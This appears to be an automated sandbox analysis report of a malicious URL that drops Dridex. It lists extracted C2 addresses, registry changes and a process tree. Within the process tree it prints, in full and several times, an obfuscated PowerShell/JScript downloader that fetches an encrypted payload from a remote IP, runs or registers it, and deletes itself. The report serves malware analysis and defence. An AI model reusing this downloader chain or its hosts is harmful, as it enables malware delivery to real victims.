Analysis
-
max time kernel
67s -
max time network
140s -
platform
windows10_x64 -
resource
win10v20201028 -
submitted
10-02-2021 01:20
Static task
static1
URLScan task
urlscan1
Sample
http://enter.testclicktds.xyz/anklmagiccheck/
General
Malware Config
Extracted
dridex
10111
51.68.224.245:4646
188.165.17.91:8443
173.255.246.77:691
Signatures
-
Suspicious use of NtCreateProcessExOtherParentProcess 2 IoCs
Processes:
WerFault.exeWerFault.exedescription pid process target process PID 2132 created 2200 2132 WerFault.exe IEXPLORE.EXE PID 2112 created 1004 2112 WerFault.exe IEXPLORE.EXE -
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\65pwm.exe cryptone C:\Users\Admin\AppData\Local\Temp\65pwm.exe cryptone C:\Users\Admin\AppData\Local\Temp\skrt7.exe cryptone C:\Users\Admin\AppData\Local\Temp\skrt7.exe cryptone -
Processes:
resource yara_rule behavioral1/memory/3960-33-0x0000000000400000-0x000000000043D000-memory.dmp dridex_ldr behavioral1/memory/3960-35-0x0000000000400000-0x000000000043D000-memory.dmp dridex_ldr -
Blocklisted process makes network request 2 IoCs
Processes:
wscript.exewscript.exeflow pid process 29 2368 wscript.exe 38 3588 wscript.exe -
Executes dropped EXE 2 IoCs
Processes:
65pwm.exeskrt7.exepid process 3960 65pwm.exe 2508 skrt7.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Processes:
65pwm.exeskrt7.exedescription ioc process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 65pwm.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA skrt7.exe -
Program crash 2 IoCs
Processes:
WerFault.exeWerFault.exepid pid_target process target process 2132 2200 WerFault.exe IEXPLORE.EXE 2112 1004 WerFault.exe IEXPLORE.EXE -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Processes:
iexplore.exeIEXPLORE.EXEIEXPLORE.EXEIEXPLORE.EXEdescription ioc process Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Internet Explorer\VersionManager\LastUpdateHighDateTime = "30867274" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateLowDateTime = "2225368983" iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames\en-US = "en-US.1" iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Internet Explorer\FlipAhead\Meta\generator$blogger iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Internet Explorer\FlipAhead\Meta\generator$Discuz! iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Internet Explorer\FlipAhead\Meta\generator$WordPress iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateLowDateTime = "2467308149" IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Internet Explorer\FlipAhead\FileVersion = "2016061511" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Internet Explorer\HistoryJournalCertificate\NextUpdateDate = "319701394" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{AFE6B686-6B3D-11EB-BEBD-5649AA4EDE66} = "0" iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000 iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000554cc9e337bf2449b17f1a10e11558d2000000000200000000001066000000010000200000004f826ac82592fc34ac5bcffe7a90d892b2750f10e15b7c468ff646a7574af7f6000000000e8000000002000020000000f3fc58ff5b5479c4dc57bbbaf95222efbcf99d3eb9d479c81c42aa558cb18b90200000003b5e50bfb35b77957eae5d3b65f0f4de77b80205824296416035b19fd7d34667400000001e088c99331c93111cc2c8de7a53171678dd56f61e98ad8d22e1ef221c525ba1004e2c79ad29137a4caf020727edd9f37f019167adaad751a29255452ddf250c iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Internet Explorer\HistoryJournalCertificate iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Internet Explorer\FlipAhead\Meta\generator$vBulletin 4 iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Internet Explorer\Main IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Internet Explorer\VersionManager iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Internet Explorer\VersionManager\LastTTLHighDateTime = "50" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1" iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = d0ec46934affd601 iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Internet Explorer\FlipAhead\Meta iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Internet Explorer\Main IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Internet Explorer\VersionManager\LastUpdateLowDateTime = "2225368983" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateHighDateTime = "30867274" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Internet Explorer\VersionManager IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateHighDateTime = "30867274" IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Internet Explorer\FlipAhead\Meta\generator$vBulletin 3 iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Internet Explorer\Main IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames\ iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Internet Explorer\FlipAhead iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Internet Explorer\FlipAhead\Meta\generator$MediaWiki iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Internet Explorer\FlipAhead\Meta\generator$Telligent iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Internet Explorer\FlipAhead\Meta\generator$http://www.typepad.com/ iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Internet Explorer\DomainSuggestion iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "319684801" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Internet Explorer\Main iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Internet Explorer\VersionManager\LastTTLLowDateTime = "1251635200" iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000554cc9e337bf2449b17f1a10e11558d200000000020000000000106600000001000020000000d08a19f625a687f7853b536230c01e949b436a40b194039d64ca27b6acdefdc9000000000e8000000002000020000000512caa25a516008dbccfaa3f25c65e0a72c2da4ca05f5ae3c8f2f26f9ceaa61320000000afef16b549769fae820364baf9068529c7f2b41ccc55b5300ba7a8eae901a2224000000066383cd01737b79ff6a2d6c3937f20b34825ca72baba8b8ffb5bf0063d4433aae957c0cba04707a64fe3cb4b4b507c53fab9341cc047ccbf0a01edb476dc4480 iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = f02336934affd601 iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Internet Explorer\FlipAhead\NextUpdateDate = "319733386" iexplore.exe -
Suspicious behavior: EnumeratesProcesses 40 IoCs
Processes:
WerFault.exePowerShell.exeWerFault.exePowerShell.exepid process 2132 WerFault.exe 2132 WerFault.exe 2132 WerFault.exe 2132 WerFault.exe 2132 WerFault.exe 2132 WerFault.exe 2132 WerFault.exe 2132 WerFault.exe 2132 WerFault.exe 2132 WerFault.exe 2132 WerFault.exe 2132 WerFault.exe 2132 WerFault.exe 2132 WerFault.exe 2132 WerFault.exe 2132 WerFault.exe 2132 WerFault.exe 2360 PowerShell.exe 2360 PowerShell.exe 2360 PowerShell.exe 2112 WerFault.exe 2112 WerFault.exe 2112 WerFault.exe 2112 WerFault.exe 2112 WerFault.exe 2112 WerFault.exe 2112 WerFault.exe 2112 WerFault.exe 2112 WerFault.exe 2112 WerFault.exe 2112 WerFault.exe 2112 WerFault.exe 2112 WerFault.exe 2112 WerFault.exe 2112 WerFault.exe 2112 WerFault.exe 2112 WerFault.exe 752 PowerShell.exe 752 PowerShell.exe 752 PowerShell.exe -
Suspicious use of AdjustPrivilegeToken 6 IoCs
Processes:
WerFault.exePowerShell.exeWerFault.exePowerShell.exedescription pid process Token: SeRestorePrivilege 2132 WerFault.exe Token: SeBackupPrivilege 2132 WerFault.exe Token: SeDebugPrivilege 2132 WerFault.exe Token: SeDebugPrivilege 2360 PowerShell.exe Token: SeDebugPrivilege 2112 WerFault.exe Token: SeDebugPrivilege 752 PowerShell.exe -
Suspicious use of FindShellTrayWindow 1 IoCs
Processes:
iexplore.exepid process 1036 iexplore.exe -
Suspicious use of SetWindowsHookEx 10 IoCs
Processes:
iexplore.exeIEXPLORE.EXEIEXPLORE.EXEIEXPLORE.EXEpid process 1036 iexplore.exe 1036 iexplore.exe 2200 IEXPLORE.EXE 2200 IEXPLORE.EXE 1004 IEXPLORE.EXE 1004 IEXPLORE.EXE 2544 IEXPLORE.EXE 2544 IEXPLORE.EXE 2544 IEXPLORE.EXE 2544 IEXPLORE.EXE -
Suspicious use of WriteProcessMemory 39 IoCs
Processes:
iexplore.exeIEXPLORE.EXEPowerShell.execmd.exewscript.execmd.exeIEXPLORE.EXEPowerShell.execmd.exewscript.execmd.exedescription pid process target process PID 1036 wrote to memory of 2200 1036 iexplore.exe IEXPLORE.EXE PID 1036 wrote to memory of 2200 1036 iexplore.exe IEXPLORE.EXE PID 1036 wrote to memory of 2200 1036 iexplore.exe IEXPLORE.EXE PID 2200 wrote to memory of 2360 2200 IEXPLORE.EXE PowerShell.exe PID 2200 wrote to memory of 2360 2200 IEXPLORE.EXE PowerShell.exe PID 2200 wrote to memory of 2360 2200 IEXPLORE.EXE PowerShell.exe PID 2360 wrote to memory of 3012 2360 PowerShell.exe cmd.exe PID 2360 wrote to memory of 3012 2360 PowerShell.exe cmd.exe PID 2360 wrote to memory of 3012 2360 PowerShell.exe cmd.exe PID 3012 wrote to memory of 2368 3012 cmd.exe wscript.exe PID 3012 wrote to memory of 2368 3012 cmd.exe wscript.exe PID 3012 wrote to memory of 2368 3012 cmd.exe wscript.exe PID 1036 wrote to memory of 1004 1036 iexplore.exe IEXPLORE.EXE PID 1036 wrote to memory of 1004 1036 iexplore.exe IEXPLORE.EXE PID 1036 wrote to memory of 1004 1036 iexplore.exe IEXPLORE.EXE PID 2368 wrote to memory of 4024 2368 wscript.exe cmd.exe PID 2368 wrote to memory of 4024 2368 wscript.exe cmd.exe PID 2368 wrote to memory of 4024 2368 wscript.exe cmd.exe PID 4024 wrote to memory of 3960 4024 cmd.exe 65pwm.exe PID 4024 wrote to memory of 3960 4024 cmd.exe 65pwm.exe PID 4024 wrote to memory of 3960 4024 cmd.exe 65pwm.exe PID 1004 wrote to memory of 752 1004 IEXPLORE.EXE PowerShell.exe PID 1004 wrote to memory of 752 1004 IEXPLORE.EXE PowerShell.exe PID 1004 wrote to memory of 752 1004 IEXPLORE.EXE PowerShell.exe PID 752 wrote to memory of 2380 752 PowerShell.exe cmd.exe PID 752 wrote to memory of 2380 752 PowerShell.exe cmd.exe PID 752 wrote to memory of 2380 752 PowerShell.exe cmd.exe PID 2380 wrote to memory of 3588 2380 cmd.exe wscript.exe PID 2380 wrote to memory of 3588 2380 cmd.exe wscript.exe PID 2380 wrote to memory of 3588 2380 cmd.exe wscript.exe PID 1036 wrote to memory of 2544 1036 iexplore.exe IEXPLORE.EXE PID 1036 wrote to memory of 2544 1036 iexplore.exe IEXPLORE.EXE PID 1036 wrote to memory of 2544 1036 iexplore.exe IEXPLORE.EXE PID 3588 wrote to memory of 2204 3588 wscript.exe cmd.exe PID 3588 wrote to memory of 2204 3588 wscript.exe cmd.exe PID 3588 wrote to memory of 2204 3588 wscript.exe cmd.exe PID 2204 wrote to memory of 2508 2204 cmd.exe skrt7.exe PID 2204 wrote to memory of 2508 2204 cmd.exe skrt7.exe PID 2204 wrote to memory of 2508 2204 cmd.exe skrt7.exe
Processes
-
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" http://enter.testclicktds.xyz/anklmagiccheck/1⤵
- Modifies Internet Explorer settings
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1036 CREDAT:82945 /prefetch:22⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\PowerShell.exe((((\..\PowerShell.exe -Command "<#AAAAAAAAAAAAAAAAAAAAAAAAA ((#>$a = ""Start-Process cmd.exe `"""cmd.exe /q /c cd /d "%tMp%" && echo function O(l){return Math.random().toString(36).slice(-5)};function V(k){var y=Q;y['set'+'Proxy'](n);y.open('GET',k(1),1);y.Option(n)=k(2);y.send();y/*XASX1ASXASS*/['Wait'+'ForResponse']();if(200==y.status)return _(y.responseText,k(n))};function _(k,e){for(var l=0,n,c=[],F=256-1,S=String,q=[],b=0;256^>b;b++)c[b]=b;for(b=0;256^>b;b++)l=l+c[b]+e['cha'+'rCodeAt'](b%e.length)^&F,n=c[b],c[b]=c[l],c[l]=n;for(var p=l=b=0;p^<k.length;p++)b=b+1^&F,l=l+c[b]^&F,n=c[b],c[b]=c[l],c[l]=n,q.push(S.fromCharCode(k.charCodeAt(p)^^c[c[b]+c[l]^&F]));return q.join('')};try{var u=WScript.Echo(),o='Object',A=Math,a=Function('b','return WScript.Create'+o+'(b)');P=(''+WScript).split(' ')[1],M='indexOf',q=a(P+'ing.FileSystem'+o),m=WScript.Arguments,e='WinHTTP',Z='cmd',Q=a('WinHttp.WinHttpRequest.5.1'),j=a('W'+P+'.Shell'),s=a('ADODB.Stream'),x=O(8)+'.',p='exe',n=0,K=WScript[P+'FullName'],E='.'+p;s.Type=2;s.Charset='iso-8859-1';s.Open();try{v=V(m)}catch(W){v=V(m)};d=v.charCodeAt(027+v[M]('PE\x00\x00'));s.WriteText(v);if(31^<d){var z=1;x+='dll'}else x+=p;s.savetofile(x,2);s.Close();z^&^&(x='regsvr'+32+E+' /s '+x);j.run(Z+E+' /c '+x,0)}catch(xXASXASSAA){};q.Deletefile(K);>3.tMp && stArt wsCripT //B //E:JScript 3.tMp cvbdfg http://188.227.57.214/?MjQ2OTYx^&fhNIcnC^&s2ht4=RGUWVxo2bk6rPE5qpZDLGpbD1DB6gqV6AH16-t_d0erZOfQC5zUaweAFmno0PVV4RpKqviUWAmhXP0ZSD9BGKYglD_pGRFLJo2VnwnbUceMgkzxKA6mVV_O4YVF4Y4gkjwa2LFaL5^&oa1n4=xH3QMrXYbRzFFYbfLf_KRqFbNUv^&jcXqsYBEANTI2MQ== "1"`"""""" ; Invoke-Command -ScriptBlock ([Scriptblock]::Create($a))"3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" cmd.exe /q /c cd /d %tMp% && echo function O(l){return Math.random().toString(36).slice(-5)};function V(k){var y=Q;y['set'+'Proxy'](n);y.open('GET',k(1),1);y.Option(n)=k(2);y.send();y/*XASX1ASXASS*/['Wait'+'ForResponse']();if(200==y.status)return _(y.responseText,k(n))};function _(k,e){for(var l=0,n,c=[],F=256-1,S=String,q=[],b=0;256^>b;b++)c[b]=b;for(b=0;256^>b;b++)l=l+c[b]+e['cha'+'rCodeAt'](b%e.length)^&F,n=c[b],c[b]=c[l],c[l]=n;for(var p=l=b=0;p^<k.length;p++)b=b+1^&F,l=l+c[b]^&F,n=c[b],c[b]=c[l],c[l]=n,q.push(S.fromCharCode(k.charCodeAt(p)^^c[c[b]+c[l]^&F]));return q.join('')};try{var u=WScript.Echo(),o='Object',A=Math,a=Function('b','return WScript.Create'+o+'(b)');P=(''+WScript).split(' ')[1],M='indexOf',q=a(P+'ing.FileSystem'+o),m=WScript.Arguments,e='WinHTTP',Z='cmd',Q=a('WinHttp.WinHttpRequest.5.1'),j=a('W'+P+'.Shell'),s=a('ADODB.Stream'),x=O(8)+'.',p='exe',n=0,K=WScript[P+'FullName'],E='.'+p;s.Type=2;s.Charset='iso-8859-1';s.Open();try{v=V(m)}catch(W){v=V(m)};d=v.charCodeAt(027+v[M]('PE\x00\x00'));s.WriteText(v);if(31^<d){var z=1;x+='dll'}else x+=p;s.savetofile(x,2);s.Close();z^&^&(x='regsvr'+32+E+' /s '+x);j.run(Z+E+' /c '+x,0)}catch(xXASXASSAA){};q.Deletefile(K);>3.tMp && stArt wsCripT //B //E:JScript 3.tMp cvbdfg http://188.227.57.214/?MjQ2OTYx^&fhNIcnC^&s2ht4=RGUWVxo2bk6rPE5qpZDLGpbD1DB6gqV6AH16-t_d0erZOfQC5zUaweAFmno0PVV4RpKqviUWAmhXP0ZSD9BGKYglD_pGRFLJo2VnwnbUceMgkzxKA6mVV_O4YVF4Y4gkjwa2LFaL5^&oa1n4=xH3QMrXYbRzFFYbfLf_KRqFbNUv^&jcXqsYBEANTI2MQ== 14⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\wscript.exewsCripT //B //E:JScript 3.tMp cvbdfg http://188.227.57.214/?MjQ2OTYx&fhNIcnC&s2ht4=RGUWVxo2bk6rPE5qpZDLGpbD1DB6gqV6AH16-t_d0erZOfQC5zUaweAFmno0PVV4RpKqviUWAmhXP0ZSD9BGKYglD_pGRFLJo2VnwnbUceMgkzxKA6mVV_O4YVF4Y4gkjwa2LFaL5&oa1n4=xH3QMrXYbRzFFYbfLf_KRqFbNUv&jcXqsYBEANTI2MQ== 15⤵
- Blocklisted process makes network request
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c 65pwm.exe6⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\65pwm.exe65pwm.exe7⤵
- Executes dropped EXE
- Checks whether UAC is enabled
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2200 -s 28363⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Program crash
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1036 CREDAT:148483 /prefetch:22⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\PowerShell.exe((((\..\PowerShell.exe -Command "<#AAAAAAAAAAAAAAAAAAAAAAAAA ((#>$a = ""Start-Process cmd.exe `"""cmd.exe /q /c cd /d "%tMp%" && echo function O(l){return Math.random().toString(36).slice(-5)};function V(k){var y=Q;y['set'+'Proxy'](n);y.open('GET',k(1),1);y.Option(n)=k(2);y.send();y/*XASX1ASXASS*/['Wait'+'ForResponse']();if(200==y.status)return _(y.responseText,k(n))};function _(k,e){for(var l=0,n,c=[],F=256-1,S=String,q=[],b=0;256^>b;b++)c[b]=b;for(b=0;256^>b;b++)l=l+c[b]+e['cha'+'rCodeAt'](b%e.length)^&F,n=c[b],c[b]=c[l],c[l]=n;for(var p=l=b=0;p^<k.length;p++)b=b+1^&F,l=l+c[b]^&F,n=c[b],c[b]=c[l],c[l]=n,q.push(S.fromCharCode(k.charCodeAt(p)^^c[c[b]+c[l]^&F]));return q.join('')};try{var u=WScript.Echo(),o='Object',A=Math,a=Function('b','return WScript.Create'+o+'(b)');P=(''+WScript).split(' ')[1],M='indexOf',q=a(P+'ing.FileSystem'+o),m=WScript.Arguments,e='WinHTTP',Z='cmd',Q=a('WinHttp.WinHttpRequest.5.1'),j=a('W'+P+'.Shell'),s=a('ADODB.Stream'),x=O(8)+'.',p='exe',n=0,K=WScript[P+'FullName'],E='.'+p;s.Type=2;s.Charset='iso-8859-1';s.Open();try{v=V(m)}catch(W){v=V(m)};d=v.charCodeAt(027+v[M]('PE\x00\x00'));s.WriteText(v);if(31^<d){var z=1;x+='dll'}else x+=p;s.savetofile(x,2);s.Close();z^&^&(x='regsvr'+32+E+' /s '+x);j.run(Z+E+' /c '+x,0)}catch(xXASXASSAA){};q.Deletefile(K);>3.tMp && stArt wsCripT //B //E:JScript 3.tMp cvbdfg http://188.227.57.214/?NDkwNDA5^&gwHi^&s2ht4=mKrVCJqveDSj2bCIEBjw8VndTjvSgfdOLq1Ubge-jgeDLgYOmMxeC15E87etzkKNzVaYsJSB-RKOYwkX_JWRFrJo21zxyLJBdJgjlBLT6mBTxekaVlkT5w4Sn6rIFqWarkFzUUFgVQXKJ50lpRXGUiPrMj9wsfS-QzNxnurN8sd3wZNt1h2v9w^&oa1n4=x3rQcvWYaRyPDojDM_jdTaRGP0vYHliIxY2Y^&tlHZIomhhMzc3Ng== "1"`"""""" ; Invoke-Command -ScriptBlock ([Scriptblock]::Create($a))"3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" cmd.exe /q /c cd /d %tMp% && echo function O(l){return Math.random().toString(36).slice(-5)};function V(k){var y=Q;y['set'+'Proxy'](n);y.open('GET',k(1),1);y.Option(n)=k(2);y.send();y/*XASX1ASXASS*/['Wait'+'ForResponse']();if(200==y.status)return _(y.responseText,k(n))};function _(k,e){for(var l=0,n,c=[],F=256-1,S=String,q=[],b=0;256^>b;b++)c[b]=b;for(b=0;256^>b;b++)l=l+c[b]+e['cha'+'rCodeAt'](b%e.length)^&F,n=c[b],c[b]=c[l],c[l]=n;for(var p=l=b=0;p^<k.length;p++)b=b+1^&F,l=l+c[b]^&F,n=c[b],c[b]=c[l],c[l]=n,q.push(S.fromCharCode(k.charCodeAt(p)^^c[c[b]+c[l]^&F]));return q.join('')};try{var u=WScript.Echo(),o='Object',A=Math,a=Function('b','return WScript.Create'+o+'(b)');P=(''+WScript).split(' ')[1],M='indexOf',q=a(P+'ing.FileSystem'+o),m=WScript.Arguments,e='WinHTTP',Z='cmd',Q=a('WinHttp.WinHttpRequest.5.1'),j=a('W'+P+'.Shell'),s=a('ADODB.Stream'),x=O(8)+'.',p='exe',n=0,K=WScript[P+'FullName'],E='.'+p;s.Type=2;s.Charset='iso-8859-1';s.Open();try{v=V(m)}catch(W){v=V(m)};d=v.charCodeAt(027+v[M]('PE\x00\x00'));s.WriteText(v);if(31^<d){var z=1;x+='dll'}else x+=p;s.savetofile(x,2);s.Close();z^&^&(x='regsvr'+32+E+' /s '+x);j.run(Z+E+' /c '+x,0)}catch(xXASXASSAA){};q.Deletefile(K);>3.tMp && stArt wsCripT //B //E:JScript 3.tMp cvbdfg http://188.227.57.214/?NDkwNDA5^&gwHi^&s2ht4=mKrVCJqveDSj2bCIEBjw8VndTjvSgfdOLq1Ubge-jgeDLgYOmMxeC15E87etzkKNzVaYsJSB-RKOYwkX_JWRFrJo21zxyLJBdJgjlBLT6mBTxekaVlkT5w4Sn6rIFqWarkFzUUFgVQXKJ50lpRXGUiPrMj9wsfS-QzNxnurN8sd3wZNt1h2v9w^&oa1n4=x3rQcvWYaRyPDojDM_jdTaRGP0vYHliIxY2Y^&tlHZIomhhMzc3Ng== 14⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\wscript.exewsCripT //B //E:JScript 3.tMp cvbdfg http://188.227.57.214/?NDkwNDA5&gwHi&s2ht4=mKrVCJqveDSj2bCIEBjw8VndTjvSgfdOLq1Ubge-jgeDLgYOmMxeC15E87etzkKNzVaYsJSB-RKOYwkX_JWRFrJo21zxyLJBdJgjlBLT6mBTxekaVlkT5w4Sn6rIFqWarkFzUUFgVQXKJ50lpRXGUiPrMj9wsfS-QzNxnurN8sd3wZNt1h2v9w&oa1n4=x3rQcvWYaRyPDojDM_jdTaRGP0vYHliIxY2Y&tlHZIomhhMzc3Ng== 15⤵
- Blocklisted process makes network request
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c skrt7.exe6⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\skrt7.exeskrt7.exe7⤵
- Executes dropped EXE
- Checks whether UAC is enabled
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1004 -s 23363⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Program crash
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1036 CREDAT:214018 /prefetch:22⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776MD5
